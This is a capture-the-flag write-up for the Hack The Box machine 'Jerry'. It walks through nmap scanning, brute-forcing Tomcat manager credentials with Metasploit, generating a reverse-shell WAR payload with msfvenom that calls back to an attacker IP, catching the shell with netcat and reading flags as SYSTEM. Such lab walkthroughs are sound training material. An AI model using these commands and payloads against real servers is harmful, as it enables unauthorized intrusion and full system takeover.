Jerry

Machine: https://app.hackthebox.com/machines/144

---

Enumeration

Port Scanning

• Using nmap in order to get opended ports and name service

nmap -p- -sS -n -Pn --min-rate 5000 10.10.10.95 -oG allPorts

Result

• now a version scanning a run some common scripts

nmap -p8080 -sCV -Pn -n --min-rate 5000 10.10.10.95 -oN Targeted

Result

Web page

• The web page is about tomcat (a service that allow it to use Java as backend language), we have the version of Tomcat 7.0.88 and we can access to “Status” feature using the default credentials admin:admin

Result

• The above credentials doesnt work on this panel manager/html so we can use this Metasploit module in order to find some common credentials

use auxiliary/scanner/http/tomcat_mgr_login

Result

Credentials: tomcat:s3cret

Exploitation

• we can use this credentials to get access to the manager, and we can upload a malicious .WAR file, and get a revershell, go lets generate it using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp --platform windows -a x64 LHOST=10.10.16.6 LPORT=4444 -f war -o payload.war

Result

• we need to check the name of the .jsp file inside the .war file, using 7z

7z l payload.war

Result

Name: qyzwvusv.jsp

• uploading the WAR file and getting access

nc -lnvp 4444

Result

• Perfect now we have access to the machine, and looks like we are nt authority\system

whoami
type \Users\Administrator\Desktop\flags\"2 for the price of 1.txt"

Result